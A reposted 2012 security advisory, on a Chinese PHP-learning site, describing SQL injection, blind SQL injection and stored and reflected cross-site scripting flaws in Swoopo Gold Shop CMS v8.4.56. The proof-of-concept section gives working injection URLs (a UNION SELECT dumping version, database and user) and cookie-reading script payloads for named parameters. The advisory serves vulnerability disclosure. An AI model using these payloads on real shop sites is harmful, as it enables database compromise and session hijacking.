网站地图    收藏   

主页 > 后端 > 网站安全 >

Swoopo Gold Shop CMS v8.4.56多个web缺陷 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] 标题:Swoopo Gold Shop CMS v8.4.56 - Multiple Web Vulnerabilities概述:=============Swoopo Gold is a shop content management system coded with PHP, Jsp connected via MySQL ......

标题:Swoopo Gold Shop CMS v8.4.56 - Multiple Web Vulnerabilities
 
概述:
=============
Swoopo Gold is a shop content management system coded with PHP, Jsp & connected via MySQL Database.
具体程序介绍请参考:Vendor Homepage: http://itechscripts.com/swoopo_clone.html )
 
 
摘要:
=========
ITtechScripts Swoopo Gold Shop CMS v8.4.56.中发现了多个缺陷
 
影响产品:ITechScripts
Product: Swoopo Gold Shop CMS v8.4.56
 
技术分析:
========
Details:
========
1.1
A remote SQL Injection vulnerability is detected in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the username post method.
 
Vulnerable Module(s):
                [+] EX_DATE - ID
 
 
1.2
A blind SQL Injection vulnerability is detected in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the itechd.php file in the product id value.
 
Vulnerable Module(s):
                [+] itechd - Product ID
 
 
 
2.1
Multiple persistent input validation vulnerabilities are detected in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user inter action because the admin needs to watch the user list.
The user includes his scriptcode as profile name and the code is getting executed on the administrator section
persistent.
 
 
Vulnerable Module(s):
                [+] Contact Form - TEXT NAME
                [+] TellaFreind - E-Mail ID
 
 
2.2
Multiple non persistent cross site scripting vulnerabilities are detected in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required
user inter action or local low privileged user account. Successful exploitation can result in account steal, phishing
& client-side content request manipulation.
 
Vulnerable Module(s):
                [+] All_Live
                [+] List_Type
                [+] User_Reg - TxTcity
                [+] reviewitechds - Product ID
 
 
Proof of Concept:
=================
1.1
The sql inejction vulnerability can be exploited by remote attackers without required user inter action.
For demonstration or reproduce ...
 
Poc:
<a href=”http://127.0.0.1:80/swoopogold/ex_date.php?id=-595+union+select+version%28%29,database%28%29,3,4,user%28%29--%20-”>
<img src=”www.vulnerability-lab.com/gfx/logo-header.png” width=”137 height=”137" /></a>
 
 
 
1.2
The blind sql inejction vulnerability can be exploited by remote attackers without required user inter action.
For demonstration or reproduce ...
 
PoC:
Pay=Select%20Payment%20Method&paymentid=1&productid=576%24%7b[BLIND SQL-INJECTION VULNERABILITY]%7d&recycle=[rem0ve]
 
<a href=”http://127.0.0.1:80/swoopogold/itechd.php?productid=604+AND+1=2--%20-[BLIND SQL-INJECTION VULNERABILITY]”>
<img src=”www.vulnerability-lab.com/gfx/logo-header.png” width=”137 height=”137" /></a>
 
 
 
2.1
The input validation vulnerabilities can be exploited by remote attackers with low-medium required user inter action.
For demonstration or reproduce ...
 
 
Review:     Contact Name Output
 
<form name="frmContact" action="contact.php" method="post"></form>
<tr><td colspan="3" align="right">
<font color="red">Fields marked with an asterisk (*)
are required  </font></td></tr>
<tr><td><blockquote>
 
<img src="templates/Default/img_files/xclabid.gif"></blockquote></td>
<td><font class="head_font" color="red">
The following must be corrected before continuing:</font></td>
</tr>
<tr><td> </td><td> Dont match the
image</td></tr>
<tr><td colspan="2" align="center"><hr class="hr_color" noshade="noshade" size="1" width="70%">
</td></tr>
<tr><td><blockquote><b>  Name<font color="red">*</font></b>
</blockquote></td>
<td>
<input name="txtName" class="txtbox" value="\" type="text">
<iframe src="a" onload='alert("VL")' <"="" size="20"></td>
</tr><tr><td><blockquote></b><b>  Email
id<font color="red">*</font></b></td>
 
<td>
<input type="text" name="txtEmail" class="txtbox" value="gabber@aol.com" size="20"></td>
</tr>
<tr>
<td><blockquote><b>  Company Name</b></td>
<td>
 
<input type="text" name="txtCname" class="txtbox"
value="\"><iframe src=a onload=alert("VL") <" size="25"></td>
          </tr>
 
URL:        http://www.2cto.com /swoopogold/contact.php
 
 
 
Review:     TellaFriend Listing Output
 
<tbody><tr>
<td class="ct"><b>Email id</b> </td>
<td class="ct"><b>Date</b> </td>
<td class="ct">Registration Details</td>
</tr>
<tr>
<td>chaudhurisuvarthi@gmail.com</td>
<td>2009-02-12 16:08:54</td>
<td>no</td>
</tr>
<tr>
<td>-1'</td>
<td>2012-04-14 17:51:41</td>
<td>no</td>
</tr>
<tr>
<td>>"<script>alert(document.cookie)</script></td>
<td>2012-04-14 17:52:08</td>
<td>no</td>
</tr>
</tbody>
 
URL:        http://www.2cto.com /swoopogold/tellafriend.php
 
 
 
2.2
The non persistent cross site scripting vulnerabilities can be exploited by remote attackers with medium
or high required user inter action. For demonstration or reproduce ...
 
Note: URL encoded GET via input cats_id.
 
PoC:
all_live.php?cats_id=<script>alert(document.cookie)</script>&list_type=0
all_live.php?cats_id=14&list_type=<script>alert(document.cookie)</script>
reviewitechds.php?productid=%<script>alert(document.cookie)</script>&recycle=yes
 
POST (multipart) input txtcity  set  " onmouseover=prompt(1337)=">
The input is getting reflected executed out of the tag element
 
 

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab Research Team or its suppliers.
 
                            Copyright © 2012 Vulnerability-Lab

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论